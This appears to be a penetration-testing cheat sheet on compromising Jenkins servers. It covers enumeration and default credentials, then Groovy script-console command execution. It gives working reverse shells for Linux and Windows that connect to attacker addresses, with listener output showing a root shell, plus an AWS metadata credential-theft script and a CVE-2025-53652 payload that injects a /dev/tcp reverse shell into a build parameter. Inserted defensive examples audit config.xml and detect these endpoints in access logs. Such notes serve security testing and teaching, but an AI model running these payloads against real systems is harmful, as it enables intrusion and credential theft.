# Jenkins

## Discovery/Footprinting

Jenkins runs on Tomcat port 8080 by default. It also utilizes port 5000 to attach slave servers.

## Open Registration

```
/signup
/jenkins/signup
```

## Enumeration

`http://jenkins.inlanefreight.local:8000/configureSecurity/`

<figure><img src="/files/GePWMx5GYuDCt06sw4dx" alt=""><figcaption></figcaption></figure>

`http://jenkins.inlanefreight.local:8000/login?from=%2F`

<figure><img src="/files/7VFyFWyygEcnQ5jOM8NQ" alt=""><figcaption></figcaption></figure>

Look for default credentials such as `admin:admin`, or for instances with no authentication enabled at all. It is not uncommon to find Jenkins instances that do not require any authentication during an internal penetration test.
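The same settings the `/configureSecurity/` page exposes are stored in `$JENKINS_HOME/config.xml`, so a defender can audit them offline. The following is an added example, not code from the original page: it checks a config for the open registration, disabled security and anonymous-admin settings enumerated above; both configs are constructed samples.

```python
import xml.etree.ElementTree as ET

# Constructed samples of a Jenkins $JENKINS_HOME/config.xml (not taken from any
# real instance); the first one carries the weak settings this page enumerates.
WEAK_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
  </securityRealm>
  <slaveAgentPort>5000</slaveAgentPort>
</hudson>"""

HARDENED_CONFIG = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:admin</permission>
    <permission>hudson.model.Hudson.Read:authenticated</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
  </securityRealm>
  <slaveAgentPort>-1</slaveAgentPort>
</hudson>"""

def audit_config(xml_text):
    """Return a list of findings for the misconfigurations discussed above."""
    root = ET.fromstring(xml_text)
    findings = []
    if (root.findtext("useSecurity") or "false").strip() != "true":
        findings.append("useSecurity=false: no authentication, every visitor is admin")
    strategy = root.find("authorizationStrategy")
    cls = strategy.get("class", "") if strategy is not None else ""
    if cls.endswith("AuthorizationStrategy$Unsecured"):
        findings.append("Unsecured authorization: anonymous has full control, /script included")
    elif strategy is not None:
        # Matrix-style strategies list permissions as "<permission>:<principal>".
        for perm in strategy.iter("permission"):
            text = (perm.text or "").strip()
            if "Administer:" in text and text.endswith(":anonymous"):
                findings.append("matrix authorization grants Administer to anonymous")
    realm = root.find("securityRealm")
    if realm is not None and realm.get("class", "").endswith("HudsonPrivateSecurityRealm"):
        if (realm.findtext("disableSignup") or "false").strip() != "true":
            findings.append("open registration: /signup lets anyone create an account")
    port = (root.findtext("slaveAgentPort") or "-1").strip()
    if port != "-1":
        findings.append(f"inbound agent port enabled ({port}; 0 = random): restrict it to agent hosts")
    return findings
```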

## Admin access - Script Console

Before Jenkins 2.0 admin access was the default; with admin access the script console is reachable at:

```
http://jenkins_server/script
```

Groovy scripts can be executed from the console: <https://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html>

#### Linux

`http://jenkins.inlanefreight.local:8000/script`

```groovy
def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout
```

<figure><img src="/files/AzdDAXiwSiQhKb0Bbawv" alt=""><figcaption></figcaption></figure>

#### Windows

```groovy
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
```

### Reverse Shell

#### Linux

```groovy
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

```shell-session
$ nc -lvnp 8443

listening on [any] 8443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.201.58] 57844

id

uid=0(root) gid=0(root) groups=0(root)

/bin/bash -i

root@app02:/var/lib/jenkins3#
```

#### Metasploit

`msf > use exploit/multi/http/jenkins_script_console`

#### Windows

{% embed url="<https://github.com/Brzozova/reverse-shell-via-Jenkins>" %}

{% embed url="<https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76>" %}

```groovy
String host = "localhost";
int port = 8044;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
```

## Retrieve AWS credentials

Requires access to the Groovy script console. The script requests an IMDSv2 token and then queries the EC2 instance metadata service with it:

```groovy
def tokenCommand = 'curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"'
def dataCommand = 'curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/'

def proc1 = ['sh', '-c', tokenCommand].execute()
def token = proc1.text.trim() // Get the token from the first command
proc1.waitFor()

if (proc1.exitValue() == 0) {
    def proc2 = ['sh', '-c', dataCommand.replace('$TOKEN', token)].execute()
    def errorBuffer = new StringBuffer()
    proc2.consumeProcessErrorStream(errorBuffer)
    println(proc2.text) // Print the response
    println(errorBuffer.toString()) // Print error messages, if any
} else {
    println("Failed to retrieve token: ${proc1.err.text}")
}
```

## No admin access, but able to add or edit build steps

{% embed url="<https://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html>" %}

{% embed url="<https://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html>" %}

Add a build step of type "Execute Windows batch command" and enter:

<figure><img src="/files/ggtM14msEXWemfQCB3cw" alt=""><figcaption></figcaption></figure>

```
powershell -c command
```

<figure><img src="/files/jck5NDBU9RdutylE9KWt" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/06yWbl56W1BdgoJxOfjh" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/PyxpwsWnjAnOvXujWYcr" alt=""><figcaption></figcaption></figure>

## CVE-2025-53652 - Command Injection via Git Parameter

```
curl -kv 'http://jenkins:8080/job/[buildName]/build' -X POST \
  -H 'Cookie: [cookie];' \
  --data-urlencode 'Jenkins-Crumb=[crumb]' \
  --data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"\$(bash -c \"bash &> /dev/tcp/10.9.49.196/1270 <&1\")"}}'
```

{% embed url="<https://www.vulncheck.com/blog/git-parameter-rce>" %}

{% embed url="<https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis>" %}

## CVE-2024-23897 - Arbitrary File Read Vulnerability Leading to RCE

{% embed url="<https://github.com/binganao/CVE-2024-23897>" %}

{% embed url="<https://github.com/h4x0r-dz/CVE-2024-23897>" %}

{% embed url="<https://0xdf.gitlab.io/2024/02/12/htb-builder.html#authenticate-jenkins-access>" %}
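Every technique above leaves a trace in the controller's HTTP access log: the script console (`/script`, `/scriptText`), self-registration (`/signup`), job configuration and build-trigger requests used for the build-step and Git Parameter paths, and the CLI endpoint that CVE-2024-23897 goes through. The following is an added detection example, not code from the original page; the log lines are constructed samples in the NCSA format Winstone writes, and the endpoint rules are assumptions about which paths matter.

```python
import re

# Jenkins access log in NCSA format (enable with
# --accessLoggerClassName=winstone.accesslog.SimpleAccessLogger).
# These lines are constructed samples, not a real capture.
SAMPLE_LOG = """\
10.0.0.7 - alice [12/Feb/2024:10:14:55 +0000] "GET /job/build-app/ HTTP/1.1" 200 9120
10.129.201.58 - - [12/Feb/2024:10:15:01 +0000] "POST /script HTTP/1.1" 200 1234
10.129.201.58 - - [12/Feb/2024:10:15:03 +0000] "POST /scriptText HTTP/1.1" 200 88
10.129.201.58 - - [12/Feb/2024:10:15:09 +0000] "GET /signup HTTP/1.1" 200 4310
10.129.201.58 - - [12/Feb/2024:10:15:40 +0000] "POST /cli?remoting=false HTTP/1.1" 200 0
10.0.0.9 - bob [12/Feb/2024:10:16:02 +0000] "POST /job/build-app/configSubmit HTTP/1.1" 302 0
10.0.0.9 - bob [12/Feb/2024:10:16:10 +0000] "POST /job/build-app/build HTTP/1.1" 201 0
"""

LINE_RE = re.compile(r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# (rule name, allowed methods, path pattern): endpoints touched by the
# techniques on this page. Assumed list; extend it for your plugins.
RULES = [
    ("script-console", "POST", r"^/(script|scriptText)(\?|$)"),
    ("cli-endpoint", "POST", r"^/cli(\?|$)"),
    ("self-signup", "GET|POST", r"^/(signup|securityRealm/createAccount)(\?|$)"),
    ("job-config-change", "POST", r"^/job/[^/]+/configSubmit(\?|$)"),
    ("job-triggered", "POST", r"^/job/[^/]+/(build|buildWithParameters)(\?|$)"),
]

def detect(log_text):
    """Return (rule, src, user, path) for every line that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        for name, methods, path_re in RULES:
            if re.fullmatch(methods, m["method"]) and re.search(path_re, m["path"]):
                hits.append((name, m["src"], m["user"], m["path"]))
    return hits

def by_source(hits):
    """Map each source address to the sorted rule names it triggered; one
    source hitting signup, the script console and the CLI in a row is the
    pattern to alert on, while config-plus-build from a known user is routine."""
    out = {}
    for name, src, _, _ in hits:
        out.setdefault(src, set()).add(name)
    return {src: sorted(names) for src, names in out.items()}
```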

## CVE-2024-43044 - Arbitrary file read that allows an agent to fetch files from the controller

{% embed url="<https://github.com/convisolabs/CVE-2024-43044-jenkins>" %}

## Tools

JenkinsVulnFinder

{% embed url="<https://github.com/Bhanunamikaze/JenkinsVulnFinder>" %}

## Resources

{% embed url="<https://0xdf.gitlab.io/2022/04/14/htb-jeeves.html>" %}

{% embed url="<https://www.hackingarticles.in/jenkins-penetration-testing/>" %}

{% embed url="<https://cloud.hacktricks.xyz/pentesting-ci-cd/jenkins-security>" %}

{% embed url="<https://exploit-notes.hdks.org/exploit/web/jenkins-pentesting/>" %}
